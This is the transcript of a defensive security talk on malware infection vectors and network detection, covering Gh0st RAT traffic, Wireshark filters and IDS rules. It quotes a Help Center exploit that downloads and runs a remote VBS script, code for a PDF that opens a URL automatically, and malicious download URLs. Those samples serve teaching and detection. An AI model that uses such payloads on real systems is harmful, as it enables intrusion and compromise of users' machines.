04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 

Taming worms, rats, dragons & more

  • 1. An Intel company ‘Taming Worms, RATs, Dragons,tjombies & More….’ By Christiaan Beek
  • 2. Agenda An Intel company • whoami • The game has changed • How malware enters your network • What goes wrong • Wireshark Kung-Fu • Countermeasures • Resources & credits • Wrap up LEGO® is a trademark of the LEGO Group of companies which does not sponsor, authorize or endorse this presentation.
  • 3. > whoami An Intel company • Christiaan Beek • Principal Architect • Foundstone EMEA IR & Forensics • Developer/Instructor MFIRE
  • 4. The game has changed An Intel company MANU- MEDICAL FACTURING DEVICE ENERGY DATABASE SCADA MOBILE EMBEDDED RSA DuQu SILICON SMART CARS NIGHT DRAGON STUXNET SOCIAL AURORA ZEUS MEDIA ATM/KIOSK APPS ENTERTAINMENT VIRTUAL RF/IR WEB BLUETOOTH
  • 5. The game has changed Total Malware Samples 70,000,000 60,000,000 50,000,000 40,000,000 30,000,000 20,000,000 10,000,000 0 McAfee threat landscape Q2 report
  • 6. The game has changed An Intel company
  • 7. Some statistics An Intel company The Gulf region gains interest by malware authors: • Number of internet users growing • Windows XP most used OS • Vulnerable IE or PDF readers
  • 8. Some statistics An Intel company Did you know: • Internet Explorer 6 has more than 473 public known vulnerabilities • So…..
  • 9. Some statistics An Intel company http://www.ie6countdown
  • 10. Some statistics An Intel company Unpatched Windows XP + IE 6 =
  • 11. Some statistics An Intel company Gulf region Malware spread vs Global Source: ThreatExpert & McAfee labs
  • 12. Some statistics – Most detected malware An Intel company Iran Iraq: Lebanon: Jordan: Backdoor.Win32.Rbot Gen.Application Virus.Win32.Virut.ce Backdoor.Trojan Mal/VBInject-D Mal/VB-G W32.Virut.CF Generic PWS.y P2P-Worm.Win32.Malas.h Malware.Virut W32/Scribble-B Infostealer.Snatch Trojan-PWS. PWS-RedNeck W32/Virut.n.gen Trojan- Win32.Sality. Trojan-Dropper Win32.SuspectCrc Downloader.Win32.VB.tty Win32.Virut.Gen. Trojan- Trojan- Worm.P2P.Malas Spy.Win32.Agent.awkh Israel: PSW.Win32.FakeAIM.e Worm:Win32/Autorun.NI W32/Scribble-B Backdoor.Win32.IRCBot.hjd TSPY_FAKEAIM.E Trojan.FakeAlert VirTool.Win32.AttackerDow Oman W32/Koobface.worm.gen n.11 Backdoor.Win32 Kuwait: W32/Sdbot.worm W32/Virut.n.gen Trojan- Backdoor.Evilbot W32/Spybot.worm.gen GameThief.Win32.Lmir P2P-Worm.Win32.SpyBot.gen Win32.Sality Syria: Trojan-Spy.Win32.Banker.gaa W32.Spybot.Worm Win32.Virut.Gen Worm.Akbot.Gen Trojan-Spy.Win32.Banbra Virus.Win32.Parite.b Worm.RBot.Gen.16 Virus.Win32.Alman.b Virus.Win32.Sality.r WORM_AUTORUN.XA United Arab Emirates Virus.Win32.Sality.l Virus.Win32.Virut.ce Saudi Arabia: Backdoor.Win32.VB.fhx Virus.Win32.Virut W32.Gammima.AG Backdoor.IRC.Bot HackTool.VB!sd6 W32/Autorun.worm W32.Spybot.Worm Malware.Harakit Trojan-Dropper.Agent W32/Sality-AI Malware.Virut Yemen TrojanDropper:Win32/VB.HE W32/Virut.n.gen PE_PARITE.A Backdoor.Win32.Cakl.a Trojan-PWS.Win32.VB WORM_AUTORUN.YN W32/Autorun.worm IRC Trojan TrojanSpy:Win32/Vwealer.CG W32/Mabezat Source: ThreatExpert & Mal/TinyDL-T Virus.Win32.Sality W32/Sality.gen McAfee labs Trojan.IRCBot Worm.IM.Sohanad W32/ZBot Trojan.Win32.Vilsel.sxw
  • 13. Some statistics – Most detected malware An Intel company "The next slide contains scenes that some color-blind people may find disturbing"
  • 14. Some statistics – Most detected malware An Intel company Iran Iraq: Lebanon: Jordan: Backdoor.Win32.Rbot Gen.Application Virus.Win32.Virut.ce Backdoor.Trojan Mal/VBInject-D Mal/VB-G W32.Virut.CF Generic PWS.y P2P-Worm.Win32.Malas.h Malware.Virut W32/Scribble-B Infostealer.Snatch Trojan-PWS. PWS-RedNeck W32/Virut.n.gen Trojan- Win32.Sality. Trojan-Dropper Win32.SuspectCrc Downloader.Win32.VB.tty Win32.Virut.Gen. Trojan- Trojan- Worm.P2P.Malas Spy.Win32.Agent.awkh Israel: PSW.Win32.FakeAIM.e Worm:Win32/Autorun.NI W32/Scribble-B Backdoor.Win32.IRCBot.hjd TSPY_FAKEAIM.E Trojan.FakeAlert VirTool.Win32.AttackerDow Oman W32/Koobface.worm.gen n.11 Backdoor.Win32 Kuwait: W32/Sdbot.worm W32/Virut.n.gen Trojan- Backdoor.Evilbot W32/Spybot.worm.gen GameThief.Win32.Lmir P2P-Worm.Win32.SpyBot.gen Win32.Sality Syria: Trojan-Spy.Win32.Banker.gaa W32.Spybot.Worm Win32.Virut.Gen Worm.Akbot.Gen Trojan-Spy.Win32.Banbra Virus.Win32.Parite.b Worm.RBot.Gen.16 Virus.Win32.Alman.b Virus.Win32.Sality.r WORM_AUTORUN.XA United Arab Emirates Virus.Win32.Sality.l Virus.Win32.Virut.ce Saudi Arabia: Backdoor.Win32.VB.fhx Virus.Win32.Virut W32.Gammima.AG Backdoor.IRC.Bot HackTool.VB!sd6 W32/Autorun.worm W32.Spybot.Worm Malware.Harakit Trojan-Dropper.Agent W32/Sality-AI Malware.Virut Yemen TrojanDropper:Win32/VB.HE W32/Virut.n.gen PE_PARITE.A Backdoor.Win32.Cakl.a Trojan-PWS.Win32.VB WORM_AUTORUN.YN W32/Autorun.worm IRC Trojan TrojanSpy:Win32/Vwealer.CG W32/Mabezat Mal/TinyDL-T Virus.Win32.Sality W32/Sality.gen Trojan.IRCBot Worm.IM.Sohanad W32/ZBot Trojan.Win32.Vilsel.sxw
  • 15. What happened in Qatar? An Intel company Source: http://blogs.technet.com/b/security/archive/2011/11/22/the-curious-case-of-qatar.aspx
  • 17. How malware enters your network An Intel company Hint: ‘ it is between the keyboard and the chair ’
  • 18. How malware enters your network An Intel company Top infection vectors: • Users browsing websites which have been infected with no outward sign of the compromise • Open attachments • Or:
  • 19. How malware enters your network An Intel company User clicks on link
  • 20. How malware enters your network An Intel company OR… User opens a PDF
  • 21. How malware enters your network An Intel company With a little effort…… # Create a simple PDF document with Origami contents = ContentStream.new contents.write ‘Black Hat Sneak Peek', :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 15 PDF.new.append_page(Page.new.setContents(contents)).save(‘Sneak peek.pdf') pdf = PDF.read(“Sneak peek.pdf") pdf.onDocumentOpen Action::URI.new('http://securitybananas.com') pdf.save(‘Sneak peek bhatpdf')
  • 22. How malware enters your network An Intel company After x redirects: script executed: grab info
  • 23. How malware enters your network An Intel company hcp://services/search?query=anything&topic=hcp:// system/sysinfo/sysinfomain.htm%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47 ,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,3 4,58,87,105,116,104,32,67,114,101,97,116,101,79,98,1 06,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72, 84,84,80,34,41,58,46,111,112,101,110,
  • 24. How malware enters your network An Intel company hcp://services/search?query=anything&topic=hcp://system/sysinf o/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u0 03fsvr=<script defer>eval(Run(String.fromCharCode (cmd /c echo B="l.vbs":With CreateObject ("MSXML2.XMLHTTP") :.open "GET","http://malicioushostsite.com/content/hcp_vbs.php?f=16 6::60&d=0::0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "" + B > %TEMP%l.vbs && %TEMP%l.vbs && taskkill /F /IM helpctr.exe)))
  • 25. How malware enters your network An Intel company Info sent: Browser version Operating System Adobe version Flash version Java version Etc.
  • 26. How malware enters your network An Intel company var jver = [0, 0, 0, 0], pdfver = [0, 0, 0, 0], flashver = [0, 0, 0, 0]; try {var PluginDetect = {handler : function (c, b, a){return function (){c(b, a)} [………….] initScript:function(){var c=this,a=navigator, e="/",i=a.userAgent| |"",g=a.vendor||"",b=a.platform||"",h=a.product||" ";c.OS=100;if(b){var f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4, "iPhone",21.1,"iPod",21.2, "iPad",21.3,"Win. * CE",22.1,"Win. * Mobile",22.2,"Pocket s * PC",22.3,"
  • 27. How malware enters your network An Intel company Info gathered: Browser version Operating System Adobe version Flash version Java version Etc.
  • 28. How malware enters your network An Intel company
  • 29. How malware enters your network An Intel company C&C server
  • 30. How malware traffic is hiding An Intel company ► Techniques used to hide traffic: • Disguising malicious traffic as web traffic • Shortened or encoded URLs • IRC over http
  • 31. An Intel company ► Techniques used to hide traffic:
  • 32. What goes wrong? An Intel company
  • 33. Problem #1 An Intel company ► many solutions but how to use them? ► education?
  • 34. Problem #2 An Intel company ► No Malware strategy ► Focus on the end-point ► but what is your end-point nowadays?
  • 35. Problem #3 An Intel company ► No layered (malware) defense ► Traffic streams unclear
  • 36. Problem #4 An Intel company ► How does malware work? ► How to recognize patterns & correlate?
  • 37. So.... An Intel company
  • 38. Wireshark Kung-Fu An Intel company
  • 39. Custom /targeted malware An Intel company ► Some recent samples of malware: • spreading: shares, USB-media, .exe infections • Search for Autocomplete information • Search for specific accounts • Keylogger • Created task to check if keylogger was running • Masked in dll files • Upload results to ftp servers
  • 40. Custom /targeted malware An Intel company ► IEAutocomplete: Type: 89c39569 Subtype: 0xf111f3e Unknown: 89c39569: [IdentitiesPass]=[,,,,$#„#Œ] Type: e161255a Subtype: 0xe161255a IE AutoComplete: [address]=[Street ********* ,] IE AutoComplete: [ini_tmp]=[pa*******] IE AutoComplete: [name]=[p********] IE AutoComplete: [num]=[01*********] IE AutoComplete: [p0]=[******ADMIN] IE AutoComplete: [rech]=[SY*******] IE AutoComplete: [username]=[22*********]
  • 41. Custom /targeted malware An Intel company ► As mentioned before, traffic is hidden using: • http(s) • ftp (traffic increase) • irc • Tcp 445 (traffic increase) • Tcp 53 (DNS) • Compression of traffic Used for downloading payload, uploading information, command & control
  • 42. Custom /targeted malware An Intel company ► Arming for detection
  • 43. Wireshark An Intel company Which filters can be used? First: tcp.dstport = =80 and http contains “GET” After analyzing this output fine-tuning filter: tcp.dstport == 80 and http contains "GET" and ip.dst_host == 67.2**.***.***
  • 44. Wireshark An Intel company ►Which filters can be used? DNS queries: dns contains “ru” or dns contains “cn” or dns contains “biz” or dns contains “dyndns.org or dns contains cc”
  • 45. T-shark An Intel company ►T-shark: command line:
  • 46. Wireshark An Intel company ►Example of Morto:
  • 47. Custom /targeted malware An Intel company ► Chinese Gh0st RAT • Full analysis by Foundstone’s Michael G.Spohn • example of Chinese RAT used in several campaigns • research project to understand working
  • 48. Custom /targeted malware An Intel company ► Chinese Gh0st RAT
  • 49. Custom /targeted malware An Intel company ► Network analysis of Chinese Gh0st RAT • Command & Control (C2) packets consists of: 1. A five byte packet header - contains the characters ‘Gh0st’. 2. A four byte integer that contains the size in bytes of the entire packet. 3. A four byte integer that contains the size in bytes of the entire packet when uncompressed. 4. A variable sized packet that contains the packet payload. The client sends small requests that contain commands, and the server responds to those commands with the requested data.
  • 50. Custom /targeted malware An Intel company ► example of commands • 50 commands used
  • 51. Custom /targeted malware An Intel company ► example of token codes • Used by server to identify payloads to client
  • 52. Custom /targeted malware An Intel company ► example of login packet
  • 53. Custom /targeted malware An Intel company ► uncompressing the login payload: First byte 66 (0x66 = 102)
  • 54. Custom /targeted malware An Intel company ► lookup 102 in RAT’s command value table:
  • 55. Custom /targeted malware An Intel company ► uncompressing the login payload: C0 A8 01 E0 = 192.168.1.249 (host ip-address)
  • 56. Custom /targeted malware An Intel company ► uncompressing the login payload: ’01’ – in this case means a webcam is present on client
  • 57. Custom /targeted malware An Intel company ► For the RE die-hards: Gh0st RAT LoginInfo structure
  • 58. Wireshark filter An Intel company ► Chinese Gh0st RAT - filter: “x47x68x30x73x74” -Gh0st
  • 59. Wireshark An Intel company ► NETBIOS traffic
  • 60. Wireshark An Intel company ► Traffic regarding TCP 445 traffic (shares, smb) Incoming file share access attempts: ((smb.cmd && ip.dst > internal network address) || (smb.cmd && ip.dst < internal network broadcast address))
  • 61. Wireshark An Intel company ►SMB worm creating .exe on share: smb.create.action == 2 and smb.file contains "exe"
  • 62. Wireshark An Intel company ► SMB .exe detection: In old days: smb.file contains "exe"
  • 63. Wireshark An Intel company ► SMB .exe detection: Taddong developed a tool to capture smb in Wireshark But… good news It’s now integrated in Wireshark Version 1.5.1 (Dev)
  • 64. Wireshark An Intel company ► SMB .exe detection: File > Export > objects > SMB
  • 65. Wireshark An Intel company ► SMB .exe detection:
  • 66. Wireshark An Intel company DEMO
  • 68. An Intel company Training & Education!!!!!
  • 69. Countermeasures An Intel company
  • 70. Countermeasures An Intel company ► Implement IDS rules to monitor/report RDP and VNC protocol use (particularly from the internet): RDP = "|43 6f 6f 6b 69 65 3a 20 6d 73 74 73 68 61 73 68|“ TPKT (RDP) = "|03 00 00 0b 06 e0|"; "|b8 e5 0d 3d 16 00|“ VNC = "|52 46 42 20 30 30 33 2e 30 30|"
  • 71. Countermeasures An Intel company ► Implement IDS rules to monitor for CMD shell usage over the network from the internet or across firewalls: CMD = "|0a 0a|C|3a 5c|"; "|0a 0a|C|3a 5c|WINDOWS|5c|"; ► Implement new signatures in IDS/DLP as they are learned
  • 72. Countermeasures An Intel company ► Detect services on non-standard ports ► Nmap the internal network: nmap -sS -p <ports> -oG results.nmap <IP or subnet range>
  • 73. Countermeasures An Intel company ► Detect services on non-standard ports ► Probe discovered ports with Amap amap -A -b -o out.amap <IP> <port> <port> ... or use the results.nmap file as input
  • 74. Countermeasures An Intel company ► Implement IDS/HIPS/DLP rules to detect outbound GET requests: Files by type (.exe, .bat, .dll etc.) in URL GET http://scan28.dosmokes.ce.ms/ InstallSystemDefender_133.bin HTTP/1.0 GET http://webmoviefiles.in/DownloaderThe.Queen.of.Fighters.450 94.exe HTTP/1.1
  • 75. Countermeasures An Intel company ► Implement IDS/HIPS/DLP rules to detect Encoded URL extensions: GET http://220407db0435.thoseros.com/get2.php?c=PXWSQSZT&d=26606B67393230312E6 4636F317E3E3D2120222724243078747D456E7579232843471710111510015D404E166 E6F1F6C06740A00050701750C787B7A0504080876787777777377707C0C0C0E6A2F2 7212634206E656D637130303E66386B3F6E575003534204020A55584C041F1B0B1D4D 442D42522A021413444A4B4E4E4F4FB7B8B2B5A2F5F4E8EBB4CFF3FCE1E1FDF5E3 BCD6CCD0B0FBFCA8C5FEA1ADB8FCCCCFD6FCC1989 781DF9F9E969C8BCDC1D4 DD8FE6E7858686FCFBFB8DFE888D8AF5EFA3AEEAB6A9A9B1E7A9A4A1EBA7ABB1 A5B7EEE5E6E6E6EFEBEDEBEAE8F89AAFB3 HTTP/1.1
  • 76. Countermeasures An Intel company ► Implement IDS/HIPS/DLP rules to detect MIME/Base64-encoded URL extensions GET http://65.75.156.141/Home/d.php?f=16&e=about.ex e HTTP/1.1 GET http://65.75.156.141/Home/d.php?f=MTYmZT1hYm 91dC5leGU== HTTP/1.1
  • 77. Wrap up An Intel company ► What have you learned? • the game has changed • malware uses all kind of ways to hide it selves • Many tools to detect malware • but…. • invest in learning the tools and how malware works • define a defense-in-depth malware strategy • create awareness • educate administrators AND Management AND users
  • 78. Resources & credits An Intel company ► Resources • Wireshark (http://www.wireshark.org) • Snort (http://www.sourcefire.com) • Nmap – (http://www.insecure.org) • Amap – (http://www.thc.org/thc-amap/) ► Special thanks to • Michael G. Spohn • Shane Shook • Tony Lee • Carric Dooley
  • 79. Shukran/Thank you! An Intel company ► Keep in touch: • Christiaan_Beek @McAfee dot com ► Twitter: • @FSEMEA • @Foundstone • @ChristaanBeek